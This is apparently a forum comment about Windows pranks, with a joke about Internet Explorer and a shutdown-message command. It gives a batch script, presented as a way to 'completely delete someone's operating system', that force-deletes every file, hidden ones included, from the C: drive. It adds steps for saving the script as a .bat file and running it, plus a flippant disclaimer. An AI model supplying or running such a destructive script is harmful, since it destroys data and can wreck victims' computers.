That's not the evilest thing. The evilest thing would be this: every time you try to shut down your computer, it opens internet explorer.

Because frankly, if they are still using IE at this point in their lives, they need to shut down their computer and reevaluate their life choices as they stare blankly at the now darkened screen. Hopefully, they wont make that mistake twice.

If you put "shutdown -s -t 00 -c "Something here"" It'll pop up "something here" in a message box for the entire time it's shutting down.
If you want to complete delete someones operating system, copy this:
@echo on
cd C:\
del /f /q /s /A:H *.*
del /f /q /s *.*
enter
@echo
into a notepad document and save it as something.bat (you can change the "something" to whatever you like), and run it.
I'm not responsible for any dumbass deciding to test this on themselves thus deleting their entire operating system...
